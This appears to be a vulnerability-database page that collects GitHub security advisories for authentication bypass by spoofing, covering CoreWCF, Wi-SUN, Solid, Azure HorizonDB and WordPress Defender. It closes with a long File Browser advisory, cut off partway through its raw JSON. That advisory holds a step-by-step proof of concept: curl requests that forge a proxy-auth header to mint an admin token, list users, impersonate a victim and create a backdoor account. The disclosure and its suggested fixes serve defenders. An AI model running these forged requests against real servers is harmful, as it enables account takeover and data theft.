Common Weakness Enumeration

CWE-290

Allowed

Authentication Bypass by Spoofing

Abstraction: Base · Status: Incomplete

This attack-focused weakness is caused by incorrectly implemented authentication schemes that are subject to spoofing attacks.

921 vulnerabilities reference this CWE, most recent first.

GHSA-XJR9-GG9Q-JX3V

Vulnerability from github – Published: 2026-06-19 20:47 – Updated: 2026-06-19 20:47
VLAI
Summary
CoreWCF: Authentication bypass in CoreWCF SAML 1.1 / 2.0 token signature validation
Details

Impact

Full impersonation of any principal the trusted STS could have issued an assertion for — including administrative principals when the relying party grants them via SAML claims. Affects both SAML 1.1 and SAML 2.0.

Preconditions

Relying-party service is hosted with WSFederationHttpBinding or WS2007FederationHttpBinding (or any binding that triggers FederatedSecurityTokenManager for issued-token validation), and IdentityConfiguration is wired (UseIdentityConfiguration = true). Attacker can reach the service over the network and knows the trusted STS’s public certificate (public certs are by design discoverable).

Patches

Fixed in CoreWCF v1.8.1 and v1.9.1

Workarounds

None

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "CoreWCF.Primitives"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.8.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "CoreWCF.Primitives"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.9.0"
            },
            {
              "fixed": "1.9.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-54782"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-290",
      "CWE-347"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-19T20:47:11Z",
    "nvd_published_at": null,
    "severity": "CRITICAL"
  },
  "details": "### Impact\nFull impersonation of any principal the trusted STS could have issued an assertion for \u2014 including administrative principals when the relying party grants them via SAML claims. Affects both SAML 1.1 and SAML 2.0.\n\n#### Preconditions\nRelying-party service is hosted with WSFederationHttpBinding or WS2007FederationHttpBinding (or any binding that triggers FederatedSecurityTokenManager for issued-token validation), and IdentityConfiguration is wired (UseIdentityConfiguration = true).\nAttacker can reach the service over the network and knows the trusted STS\u2019s public certificate (public certs are by design discoverable).\n\n### Patches\nFixed in CoreWCF v1.8.1 and v1.9.1\n\n### Workarounds\nNone",
  "id": "GHSA-xjr9-gg9q-jx3v",
  "modified": "2026-06-19T20:47:11Z",
  "published": "2026-06-19T20:47:11Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/CoreWCF/CoreWCF/security/advisories/GHSA-xjr9-gg9q-jx3v"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/CoreWCF/CoreWCF"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "CoreWCF: Authentication bypass in CoreWCF SAML 1.1 / 2.0 token signature validation"
}

GHSA-XM9X-VJCF-6HVV

Vulnerability from github – Published: 2025-09-12 12:30 – Updated: 2025-09-12 12:30
VLAI
Details

Wi-SUN unexpected 4- Way Handshake packet receptions may lead to predictable keys and potentially leading to Man in the middle (MitM) attack

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-7448"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-290"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-09-12T10:15:32Z",
    "severity": "HIGH"
  },
  "details": "Wi-SUN unexpected 4- Way Handshake packet receptions may lead to predictable keys and potentially leading to Man in the middle (MitM) attack",
  "id": "GHSA-xm9x-vjcf-6hvv",
  "modified": "2025-09-12T12:30:23Z",
  "published": "2025-09-12T12:30:23Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7448"
    },
    {
      "type": "WEB",
      "url": "https://community.silabs.com/068Vm00000UtuIG"
    },
    {
      "type": "WEB",
      "url": "https://docs.silabs.com/sisdk-release-notes/latest/sisdk-wisun-release-notes"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-XMH9-RG6F-J3MR

Vulnerability from github – Published: 2021-03-12 22:39 – Updated: 2021-03-10 04:01
VLAI
Summary
Verification flaw in Solid identity-token-verifier
Details

Impact

Severity

Any Pod on a Solid server using a vulnerable version of the identity-token-verifier library is at risk of a spoofed Demonstration of Proof-of-Possession (DPoP) token binding. This vulnerability could give total and complete access to a targeted Pod.

Summary

A verification flaw in the implementation of the identity token verifier library (https://github.com/solid/identity-token-verifier) allows DPoP proofs to be spoofed.

DPoP proofs are used to bind access tokens to a private key meant to be in sole possession of a specific user. Instead of verifying against the hash of an embedded public key, the library instead verifies against a field that an attacker can modify to spoof another user’s DPoP.

A stolen DPoP proof, when used in the right context, therefore allows the rebinding of a DPoP-bound access token. Any attacker in possession of a targeted access token could build an attack environment to replay it on any Pod service with this vulnerability.

Patches

A new version 0.5.2 of identity-token-verifier fixes the verification: https://github.com/solid/identity-token-verifier/blob/7e18d86d65ee681e8ae912b6a032a1bae3cae570/src/lib/DPoP.ts#L25-L35

Workarounds

None

References

Are there any links users can visit to find out more?

For more information

If you have any questions or comments about this advisory: * Open an issue in the identity-token-verifier repository. * Email: info@solidproject.org

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@solid/identity-token-verifier"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.5.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-290"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2021-03-10T04:01:48Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "### Impact\n#### Severity\nAny Pod on a Solid server using a vulnerable version of the identity-token-verifier library is at risk of a spoofed Demonstration of Proof-of-Possession (DPoP) token binding. This vulnerability could give total and complete access to a targeted Pod.\n\n#### Summary\nA verification flaw in the implementation of the identity token verifier library (https://github.com/solid/identity-token-verifier) allows DPoP proofs to be spoofed. \n\nDPoP proofs are used to bind access tokens to a private key meant to be in sole possession of a specific user. Instead of verifying against the hash of an embedded public key, the library instead verifies against a field that an attacker can modify to spoof another user\u2019s DPoP. \n\nA stolen DPoP proof, when used in the right context, therefore allows the rebinding of a DPoP-bound access token. Any attacker in possession of a targeted access token could build an attack environment to replay it on any Pod service with this vulnerability.  \n\n\n### Patches\nA new version 0.5.2 of identity-token-verifier fixes the verification: https://github.com/solid/identity-token-verifier/blob/7e18d86d65ee681e8ae912b6a032a1bae3cae570/src/lib/DPoP.ts#L25-L35\n\n### Workarounds\nNone\n\n### References\n_Are there any links users can visit to find out more?_\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in the [identity-token-verifier](https://github.com/solid/identity-token-verifier/) repository.\n* Email: info@solidproject.org",
  "id": "GHSA-xmh9-rg6f-j3mr",
  "modified": "2021-03-10T04:01:48Z",
  "published": "2021-03-12T22:39:01Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/solid/identity-token-verifier/security/advisories/GHSA-xmh9-rg6f-j3mr"
    },
    {
      "type": "WEB",
      "url": "https://github.com/solid/identity-token-verifier/commit/fbdeb4aa8c12694b3744cd0454acb826817d9e6c"
    },
    {
      "type": "WEB",
      "url": "https://github.com/solid/identity-token-verifier/releases/tag/0.5.2"
    },
    {
      "type": "WEB",
      "url": "https://www.npmjs.com/package/@solid/identity-token-verifier"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [],
  "summary": "Verification flaw in Solid identity-token-verifier"
}

GHSA-XMR7-V6QH-4CP6

Vulnerability from github – Published: 2026-06-05 00:31 – Updated: 2026-06-05 00:31
VLAI
Details

Authentication bypass by spoofing in Azure HorizonDB allows an unauthorized attacker to elevate privileges over a network.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-48567"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-290"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-06-04T23:17:32Z",
    "severity": "CRITICAL"
  },
  "details": "Authentication bypass by spoofing in Azure HorizonDB allows an unauthorized attacker to elevate privileges over a network.",
  "id": "GHSA-xmr7-v6qh-4cp6",
  "modified": "2026-06-05T00:31:52Z",
  "published": "2026-06-05T00:31:52Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-48567"
    },
    {
      "type": "WEB",
      "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-48567"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-XP92-3Q3C-QCQJ

Vulnerability from github – Published: 2024-05-17 09:31 – Updated: 2024-05-17 09:31
VLAI
Details

Authentication Bypass by Spoofing vulnerability in WPMU DEV Defender Security allows Functionality Bypass.This issue affects Defender Security: from n/a through 4.4.1.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-25595"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-290"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-05-17T09:15:25Z",
    "severity": "MODERATE"
  },
  "details": "Authentication Bypass by Spoofing vulnerability in WPMU DEV Defender Security allows Functionality Bypass.This issue affects Defender Security: from n/a through 4.4.1.",
  "id": "GHSA-xp92-3q3c-qcqj",
  "modified": "2024-05-17T09:31:02Z",
  "published": "2024-05-17T09:31:02Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-25595"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/vulnerability/defender-security/wordpress-defender-security-plugin-4-4-1-ip-restriction-bypass-vulnerability?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-XQP3-JQ6G-X3QM

Vulnerability from github – Published: 2026-07-10 19:27 – Updated: 2026-07-10 19:27
VLAI
Summary
File Browser: Authentication Bypass via Proxy Auth Header Forgery
Details

Summary

When FileBrowser is configured with proxy authentication (auth.method=proxy), any unauthenticated attacker who can reach the server directly can impersonate any user - including admin - by sending a single forged HTTP header. No credentials are required. Additionally, specifying a non-existent username causes the server to automatically create a new user account, providing an account creation primitive with no authorization.

This is an already known issue that has been documented in the documentation for several years, but has not been documented as a vulnerability before.

Severity

HIGH - CVSS 3.1: 8.1 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N)

Affected Component

  • File: auth/proxy.go, lines 21-28
  • CWE: CWE-287 (Improper Authentication), CWE-290 (Authentication Bypass by Spoofing)
  • Affected versions: All versions supporting auth.method=proxy

Prerequisite: Proxy Auth Must Be Enabled

This vulnerability is NOT exploitable on default configuration (auth.method=json). It requires the administrator to have configured proxy authentication mode. However, this is a common production deployment pattern - many organizations run FileBrowser behind a reverse proxy that handles SSO/LDAP/OAuth authentication:

  • nginx + Authelia / Authentik
  • Traefik + OAuth2 Proxy
  • Caddy + forward_auth
  • Apache + mod_auth_ldap

In these setups, the proxy authenticates the user and passes the username via HTTP header (e.g., X-Remote-User). FileBrowser trusts this header to identify the user.

Deployment Scenario Exploitable?
Default install (auth.method=json) No — JSON auth uses password verification
auth.method=proxy + FileBrowser only reachable via proxy (bound to 127.0.0.1 or firewalled) No - attacker cannot reach the server directly
auth.method=proxy + FileBrowser port exposed to network Yes - full admin takeover

The third scenario is common because: - Docker containers publish ports to 0.0.0.0 by default (e.g., -p 8085:80) - Administrators expose the port for debugging, monitoring, or health checks - Cloud deployments may have misconfigured security groups or load balancers - Internal networks often lack strict micro-segmentation

The core issue is that the code itself has zero defensive checks — no trusted IP validation, no shared secret, no origin verification. The entire security model relies on network-level isolation, which is fragile and not documented as a hard requirement.

Root Cause

The ProxyAuth.Auth() function unconditionally trusts the value of an HTTP request header (configured via auth.header, e.g. X-Remote-User) to determine the authenticated user's identity. There are three distinct problems in this code:

Problem 1: No Origin Validation

The function reads the header from any HTTP request regardless of source IP. It does not verify that the request originated from a trusted reverse proxy. Any client on the network can set arbitrary HTTP headers.

File: auth/proxy.go, lines 21-28:

func (a ProxyAuth) Auth(r *http.Request, usr users.Store, setting *settings.Settings, srv *settings.Server) (*users.User, error) {
    username := r.Header.Get(a.Header)  // <-- reads attacker-controlled header, no origin check
    user, err := usr.Get(srv.Root, username)
    if errors.Is(err, fberrors.ErrNotExist) {
        return a.createUser(usr, setting, srv, username)
    }
    return user, err  // <-- returns the user object, no password verification
}

There is no call to verify r.RemoteAddr against a list of trusted proxy IPs, no shared secret validation, and no signature check on the header value.

Problem 2: No Password Verification

Unlike JSON auth (auth/json.go) which validates the password via bcrypt, the proxy auth path returns the user object directly from the database based solely on the header value. The loginHandler in http/auth.go then mints a valid JWT for this user:

File: http/auth.go, lines 121-137:

func loginHandler(tokenExpireTime time.Duration) handleFunc {
    return func(w http.ResponseWriter, r *http.Request, d *data) (int, error) {
        auther, err := d.store.Auth.Get(d.settings.AuthMethod)
        // ...
        user, err := auther.Auth(r, d.store.Users, d.settings, d.server)
        // No additional verification — if auther.Auth() returns a user, a JWT is minted
        return printToken(w, r, d, user, tokenExpireTime)  // <-- signs and returns JWT
    }
}

Problem 3: Automatic User Creation

If the username in the header doesn't exist in the database, createUser() is called unconditionally. This creates a real user account with default permissions, a random locked password, and a home directory:

File: auth/proxy.go, lines 30-63:

func (a ProxyAuth) createUser(usr users.Store, setting *settings.Settings, srv *settings.Server, username string) (*users.User, error) {
    pwd, err := users.RandomPwd(randomPasswordLength)
    // ...
    user := &users.User{
        Username:     username,       // <-- attacker-controlled
        Password:     hashedRandomPassword,
        LockPassword: true,
    }
    setting.Defaults.Apply(user)      // <-- inherits default permissions (may include execute, create, etc.)
    // ...
    err = usr.Save(user)              // <-- persisted to database
    return user, nil
}

This auto-creation has no opt-in flag — it is always active when proxy auth is enabled.

Complete Attack Flow

Attacker sends:   POST /api/login  +  Header: X-Remote-User: admin
                                         |
loginHandler()                           |
  |-> d.store.Auth.Get("proxy")         |
  |-> auther.Auth(r, ...)               |
        |-> ProxyAuth.Auth()             |
              |-> r.Header.Get("X-Remote-User")  ->  "admin"     (attacker-controlled)
              |-> usr.Get(root, "admin")          ->  admin user  (found in DB)
              |-> return user, nil                ->  no password check
  |-> printToken(w, r, d, user, ...)    |
        |-> jwt.NewWithClaims(HS256, claims{user: admin, perm: {admin: true}})
        |-> token.SignedString(key)     ->  valid admin JWT returned to attacker

Proof of Concept

Here is Log testing using Low Privileges Account attacker, get forbidden Login as low priv user then get the auth token "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjp7ImlkIjozLCJsb2NhbGUiOiIiLCJ2aWV3TW9kZSI6Imxpc3QiLCJzaW5nbGVDbGljayI6ZmFsc2UsInJlZGlyZWN0QWZ0ZXJDb3B5TW92ZSI6ZmFsc2UsInBlcm0iOnsiYWRtaW4iOmZhbHNlLCJleGVjdXRlIjp0cnVlLCJjcmVhdGUiOmZhbHNlLCJyZW5hbWUiOmZhbHNlLCJtb2RpZnkiOmZhbHNlLCJkZWxldGUiOmZhbHNlLCJzaGFyZSI6ZmFsc2UsImRvd25sb2FkIjp0cnVlfSwiY29tbWFuZHMiOlsibHMiXSwibG9ja1Bhc3N3b3JkIjpmYWxzZSwiaGlkZURvdGZpbGVzIjpmYWxzZSwiZGF0ZUZvcm1hdCI6ZmFsc2UsInVzZXJuYW1lIjoiYXR0YWNrZXIiLCJhY2VFZGl0b3JUaGVtZSI6IiJ9LCJpc3MiOiJGaWxlIEJyb3dzZXIiLCJleHAiOjE3NzMwMjc2ODksImlhdCI6MTc3MzAyMDQ4OX0.NN0SqBr8lFj7QUACY2770gaGXZhBZ2qJZHDJJ7vQbNM"

root@LAPTOP-VUMRCEKO:~# curl -s http://localhost:8085/api/settings \
  -H "X-Auth: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjp7ImlkIjozLCJsb2NhbGUiOiIiLCJ2aWV3TW9kZSI6Imxpc3QiLCJzaW5nbGVDbGljayI6ZmFsc2UsInJlZGlyZWN0QWZ0ZXJDb3B5TW92ZSI6ZmFsc2UsInBlcm0iOnsiYWRtaW4iOmZhbHNlLCJleGVjdXRlIjp0cnVlLCJjcmVhdGUiOmZhbHNlLCJyZW5hbWUiOmZhbHNlLCJtb2RpZnkiOmZhbHNlLCJkZWxldGUiOmZhbHNlLCJzaGFyZSI6ZmFsc2UsImRvd25sb2FkIjp0cnVlfSwiY29tbWFuZHMiOlsibHMiXSwibG9ja1Bhc3N3b3JkIjpmYWxzZSwiaGlkZURvdGZpbGVzIjpmYWxzZSwiZGF0ZUZvcm1hdCI6ZmFsc2UsInVzZXJuYW1lIjoiYXR0YWNrZXIiLCJhY2VFZGl0b3JUaGVtZSI6IiJ9LCJpc3MiOiJGaWxlIEJyb3dzZXIiLCJleHAiOjE3NzMwMjc2ODksImlhdCI6MTc3MzAyMDQ4OX0.NN0SqBr8lFj7QUACY2770gaGXZhBZ2qJZHDJJ7vQbNM"
403 Forbidden
root@LAPTOP-VUMRCEKO:~#
root@LAPTOP-VUMRCEKO:~#
root@LAPTOP-VUMRCEKO:~# FORGED_TOKEN=$(curl -s -X POST http://localhost:8085/api/login \
  -H "X-Remote-User: admin")
root@LAPTOP-VUMRCEKO:~#
root@LAPTOP-VUMRCEKO:~# curl -s http://localhost:8085/api/settings \
  -H "X-Auth: $FORGED_TOKEN" | python3 -m json.tool
{
    "signup": false,
    "hideLoginButton": true,
    "createUserDir": false,
    "minimumPasswordLength": 12,
    "userHomeBasePath": "/users",
    "defaults": {
        "scope": ".",
        "locale": "en",
        "viewMode": "mosaic",
        "singleClick": false,
        "redirectAfterCopyMove": true,
        "sorting": {
            "by": "",
            "asc": false
        },
        "perm": {
            "admin": false,
            "execute": true,
            "create": true,
            "rename": true,
            "modify": true,
            "delete": true,
            "share": true,
            "download": true
        },
        "commands": [],
        "hideDotfiles": false,
        "dateFormat": false,
        "aceEditorTheme": ""
    },
    "authMethod": "proxy",
    "rules": [],
    "branding": {
        "name": "",
        "disableExternal": false,
        "disableUsedPercentage": false,
        "files": "",
        "theme": "",
        "color": ""
    },
    "tus": {
        "chunkSize": 10485760,
        "retryCount": 5
    },
    "shell": [
        "/bin/sh",
        "-c"
    ],
    "commands": {
        "after_copy": [],
        "after_delete": [],
        "after_rename": [],
        "after_save": [],
        "after_upload": [],
        "before_copy": [],
        "before_delete": [],
        "before_rename": [],
        "before_save": [],
        "before_upload": []
    }
}
root@LAPTOP-VUMRCEKO:~#

image

Prerequisites

  • FileBrowser with proxy auth enabled: bash filebrowser config set --auth.method=proxy --auth.header=X-Remote-User
  • Server is reachable directly (not exclusively behind the reverse proxy)

Step 1: Confirm attacker (non-admin) is blocked

# Using a legitimate non-admin JWT token:
curl -s http://localhost:8085/api/settings \
  -H "X-Auth: <ATTACKER_JWT_TOKEN>"

Result: 403 Forbidden — non-admin users cannot access /api/settings

Step 2: Forge admin identity — no credentials needed

# Just one header, no password:
FORGED_TOKEN=$(curl -s -X POST http://localhost:8085/api/login \
  -H "X-Remote-User: admin")

echo "$FORGED_TOKEN"
# eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjp7ImlkIjoxLC... (608 bytes)

Result: Valid JWT token returned for admin user (ID: 1, perm.admin: true)

Step 3: Access admin-only endpoints with forged token

# Read full server configuration (admin-only):
curl -s http://localhost:8085/api/settings \
  -H "X-Auth: $FORGED_TOKEN"

Result: 200 OK - complete server settings returned:

{
    "authMethod": "proxy",
    "shell": ["/bin/sh", "-c"],
    "signup": false,
    "defaults": { "perm": { "admin": false, "execute": true, ... } },
    ...
}

Step 4: Enumerate all user accounts

curl -s http://localhost:8085/api/users \
  -H "X-Auth: $FORGED_TOKEN"

Result: All user accounts with full details (usernames, permissions, scopes, commands)

Step 5: Impersonate any other user

# Impersonate "testuser" — access their files without knowing their password:
VICTIM_TOKEN=$(curl -s -X POST http://localhost:8085/api/login \
  -H "X-Remote-User: testuser")

curl -s http://localhost:8085/api/resources/ \
  -H "X-Auth: $VICTIM_TOKEN"

Result: Full file listing of testuser's scope

Step 6: Auto-create a new user account

# This username doesn't exist — server creates it automatically:
NEW_TOKEN=$(curl -s -X POST http://localhost:8085/api/login \
  -H "X-Remote-User: backdoor_account")

Result: New user backdoor_account created in the database with default permissions, JWT returned

Validated Results

Tested against filebrowser/filebrowser:latest Docker image on 2026-03-09:

Test Result
Attacker token (non-admin) -> GET /api/settings 403 Forbidden (blocked)
Forged header X-Remote-User: admin -> POST /api/login 200 OK — valid admin JWT (608 bytes)
Forged admin token -> GET /api/settings 200 OK — full server config returned
Forged admin token -> GET /api/users 200 OK — all user accounts listed
Forged header X-Remote-User: testuser 200 OK — testuser JWT, files accessible
Forged header X-Remote-User: nonexistent_user 200 OK — new user auto-created, JWT returned

Impact

An unauthenticated attacker who can reach the FileBrowser instance directly can:

  1. Full admin takeover — impersonate the admin user and gain complete control
  2. Read all server settings — shell configuration, permissions, branding, rules
  3. Enumerate and impersonate all users — access every user's files without credentials
  4. Create unlimited backdoor accounts — auto-creation generates persistent accounts
  5. Modify server configuration — enable command execution, change shell, alter rules
  6. Chain with other vulnerabilities — gain admin access -> enable shell mode -> achieve RCE

Attack cost: Zero credentials. One HTTP header.

Suggested Remediation

Fix 1: Add trusted proxy IP validation (recommended)

type ProxyAuth struct {
    Header         string   `json:"header"`
    TrustedProxies []string `json:"trustedProxies"` // New: list of trusted proxy IPs/CIDRs
}

func (a ProxyAuth) Auth(r *http.Request, usr users.Store, setting *settings.Settings, srv *settings.Server) (*users.User, error) {
    // Verify request originates from a trusted reverse proxy
    clientIP := realip.FromRequest(r)
    if !a.isTrustedProxy(clientIP) {
        return nil, fmt.Errorf("proxy auth: request from untrusted source %s", clientIP)
    }

    username := r.Header.Get(a.Header)
    if username == "" {
        return nil, os.ErrPermission
    }

    user, err := usr.Get(srv.Root, username)
    if errors.Is(err, fberrors.ErrNotExist) {
        if a.AutoCreateUsers {  // Make opt-in
            return a.createUser(usr, setting, srv, username)
        }
        return nil, os.ErrPermission
    }
    return user, err
}

Fix 2: Make auto-user-creation opt-in

Add a configuration flag auth.proxy.createUsers (default: false) so administrators must explicitly enable automatic account creation.

Fix 3: Documentation warning

Clearly document that when using proxy auth: - FileBrowser MUST NOT be directly accessible from untrusted networks - Bind to 127.0.0.1 or use firewall rules to ensure only the reverse proxy can reach it - The reverse proxy MUST strip/overwrite the configured header from client requests

References

  • Source file: https://github.com/filebrowser/filebrowser/blob/main/auth/proxy.go
  • Login handler: https://github.com/filebrowser/filebrowser/blob/main/http/auth.go#L121-L137
  • CWE-287: https://cwe.mitre.org/data/definitions/287.html
  • CWE-290: https://cwe.mitre.org/data/definitions/290.html
  • OWASP Authentication Cheat Sheet: https://cheatsheetseries.owasp.org/cheatsheets/Authentication_Cheat_Sheet.html
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/filebrowser/filebrowser/v2"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.0.0-rc.1"
            },
            {
              "last_affected": "2.63.18"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-54089"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-287",
      "CWE-290"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-07-10T19:27:13Z",
    "nvd_published_at": "2026-06-25T19:16:40Z",
    "severity": "CRITICAL"
  },
  "details": "## Summary\n\nWhen FileBrowser is configured with proxy authentication (`auth.method=proxy`), any unauthenticated attacker who can reach the server directly can impersonate **any user - including admin** - by sending a single forged HTTP header. No credentials are required. Additionally, specifying a non-existent username causes the server to **automatically create a new user account**, providing an account creation primitive with no authorization.\n\n**This is an already known issue that has been documented in the documentation for several years, but has not been documented as a vulnerability before.**\n\n## Severity\n\n**HIGH** - CVSS 3.1: **8.1** (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N)\n\n## Affected Component\n\n- **File:** [`auth/proxy.go`](https://github.com/filebrowser/filebrowser/blob/main/auth/proxy.go), lines 21-28\n- **CWE:** [CWE-287](https://cwe.mitre.org/data/definitions/287.html) (Improper Authentication), [CWE-290](https://cwe.mitre.org/data/definitions/290.html) (Authentication Bypass by Spoofing)\n- **Affected versions:** All versions supporting `auth.method=proxy`\n\n## Prerequisite: Proxy Auth Must Be Enabled\n\nThis vulnerability is **NOT exploitable on default configuration** (`auth.method=json`). It requires the administrator to have configured proxy authentication mode. However, this is a **common production deployment pattern** - many organizations run FileBrowser behind a reverse proxy that handles SSO/LDAP/OAuth authentication:\n\n- **nginx** + Authelia / Authentik\n- **Traefik** + OAuth2 Proxy\n- **Caddy** + forward_auth\n- **Apache** + mod_auth_ldap\n\nIn these setups, the proxy authenticates the user and passes the username via HTTP header (e.g., `X-Remote-User`). FileBrowser trusts this header to identify the user.\n\n| Deployment Scenario | Exploitable? |\n|---|---|\n| Default install (`auth.method=json`) | **No** \u2014 JSON auth uses password verification |\n| `auth.method=proxy` + FileBrowser only reachable via proxy (bound to `127.0.0.1` or firewalled) | **No** - attacker cannot reach the server directly |\n| `auth.method=proxy` + FileBrowser port exposed to network | **Yes - full admin takeover** |\n\nThe third scenario is common because:\n- Docker containers publish ports to `0.0.0.0` by default (e.g., `-p 8085:80`)\n- Administrators expose the port for debugging, monitoring, or health checks\n- Cloud deployments may have misconfigured security groups or load balancers\n- Internal networks often lack strict micro-segmentation\n\nThe core issue is that the **code itself has zero defensive checks** \u2014 no trusted IP validation, no shared secret, no origin verification. The entire security model relies on network-level isolation, which is fragile and not documented as a hard requirement.\n\n## Root Cause\n\nThe `ProxyAuth.Auth()` function unconditionally trusts the value of an HTTP request header (configured via `auth.header`, e.g. `X-Remote-User`) to determine the authenticated user\u0027s identity. There are **three distinct problems** in this code:\n\n### Problem 1: No Origin Validation\n\nThe function reads the header from **any** HTTP request regardless of source IP. It does not verify that the request originated from a trusted reverse proxy. Any client on the network can set arbitrary HTTP headers.\n\n**File: [`auth/proxy.go`](https://github.com/filebrowser/filebrowser/blob/main/auth/proxy.go), lines 21-28:**\n\n```go\nfunc (a ProxyAuth) Auth(r *http.Request, usr users.Store, setting *settings.Settings, srv *settings.Server) (*users.User, error) {\n    username := r.Header.Get(a.Header)  // \u003c-- reads attacker-controlled header, no origin check\n    user, err := usr.Get(srv.Root, username)\n    if errors.Is(err, fberrors.ErrNotExist) {\n        return a.createUser(usr, setting, srv, username)\n    }\n    return user, err  // \u003c-- returns the user object, no password verification\n}\n```\n\nThere is no call to verify `r.RemoteAddr` against a list of trusted proxy IPs, no shared secret validation, and no signature check on the header value.\n\n### Problem 2: No Password Verification\n\nUnlike JSON auth (`auth/json.go`) which validates the password via bcrypt, the proxy auth path returns the user object directly from the database based solely on the header value. The `loginHandler` in `http/auth.go` then mints a valid JWT for this user:\n\n**File: [`http/auth.go`](https://github.com/filebrowser/filebrowser/blob/main/http/auth.go), lines 121-137:**\n\n```go\nfunc loginHandler(tokenExpireTime time.Duration) handleFunc {\n    return func(w http.ResponseWriter, r *http.Request, d *data) (int, error) {\n        auther, err := d.store.Auth.Get(d.settings.AuthMethod)\n        // ...\n        user, err := auther.Auth(r, d.store.Users, d.settings, d.server)\n        // No additional verification \u2014 if auther.Auth() returns a user, a JWT is minted\n        return printToken(w, r, d, user, tokenExpireTime)  // \u003c-- signs and returns JWT\n    }\n}\n```\n\n### Problem 3: Automatic User Creation\n\nIf the username in the header doesn\u0027t exist in the database, `createUser()` is called unconditionally. This creates a real user account with default permissions, a random locked password, and a home directory:\n\n**File: [`auth/proxy.go`](https://github.com/filebrowser/filebrowser/blob/main/auth/proxy.go), lines 30-63:**\n\n```go\nfunc (a ProxyAuth) createUser(usr users.Store, setting *settings.Settings, srv *settings.Server, username string) (*users.User, error) {\n    pwd, err := users.RandomPwd(randomPasswordLength)\n    // ...\n    user := \u0026users.User{\n        Username:     username,       // \u003c-- attacker-controlled\n        Password:     hashedRandomPassword,\n        LockPassword: true,\n    }\n    setting.Defaults.Apply(user)      // \u003c-- inherits default permissions (may include execute, create, etc.)\n    // ...\n    err = usr.Save(user)              // \u003c-- persisted to database\n    return user, nil\n}\n```\n\nThis auto-creation has no opt-in flag \u2014 it is always active when proxy auth is enabled.\n\n### Complete Attack Flow\n\n```\nAttacker sends:   POST /api/login  +  Header: X-Remote-User: admin\n                                         |\nloginHandler()                           |\n  |-\u003e d.store.Auth.Get(\"proxy\")         |\n  |-\u003e auther.Auth(r, ...)               |\n        |-\u003e ProxyAuth.Auth()             |\n              |-\u003e r.Header.Get(\"X-Remote-User\")  -\u003e  \"admin\"     (attacker-controlled)\n              |-\u003e usr.Get(root, \"admin\")          -\u003e  admin user  (found in DB)\n              |-\u003e return user, nil                -\u003e  no 